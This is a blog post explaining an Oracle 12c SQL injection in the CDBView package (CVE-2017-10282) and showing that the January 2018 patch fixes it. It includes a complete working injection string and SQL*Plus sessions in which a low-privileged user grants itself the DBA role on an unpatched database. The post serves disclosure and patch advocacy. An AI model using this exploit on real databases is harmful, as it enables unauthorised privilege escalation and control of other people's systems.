SQL Injection on 12c CDBView package finally fixed on 180116

This post is also available in: Português

Since last quarter of 2016, a very easy to explore SQL Injection came to public where having a combination CREATE SESSION + EXECUTE_CATALOG_ROLE, an user could escalate his privileges to DBA. The first time I've read about this leak was on Mahmoud Hatem blog.

This SQL Injection affects 12.1.0.2 and 12.2.0.1 when the user has this privileges on CDB$ROOT or if it is a non-CDB.

After investigating all the code changes performed by 180116 CPU on BPs, PSUs, RU and RURs (for all changes click on the link), I could notice that oracle created a subfunction called isLegalOwnerViewName in CDBView to do something similar to DBMS_ASSERT:

Checking the list of all CVUs corrected by this updates, we can then infer that this bug is the CVE-2017-10282 created only on 21/June/2017.

Let's try to apply the injection in a 12.2 version with 171017 RU and 180116 RU, comparing the results:

On 12.2.0.1 with RU 171017  applied:

WARNING: In this Example the view ALL_CUBES will be replaced.

[oracle@localhost ~]$ opatch lspatches
26710464;Database Release Update : 12.2.0.1.171017 (26710464)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:10:29 2018

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> -- DON'T RUN IN PRODUCTION --
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00905: missing keyword
ORA-06512: at "SYS.CDBVIEW", line 56
ORA-06512: at line 1


SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

X
--------------------------------------------------------------------------------
1

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
DBA
EXECUTE_CATALOG_ROLE

SQL>

The SQL Injection did work.

And now on 12.2.0.1 with RU 180116 applied:

[oracle@localhost ~]$ opatch lspatches
27105253;Database Release Update : 12.2.0.1.180116 (27105253)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:20:46 2018

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00942: table or view does not exist
ORA-06512: at "SYS.CDBVIEW", line 39
ORA-06512: at line 1


SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

no rows selected

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL>

SQL Injection didn't work anymore.

This is yet another reason to stay always in the latest SPU/PSU/BP/RU/RUR or whatever security fix you apply.

References:

• http://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
• https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/
• http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixDB

+3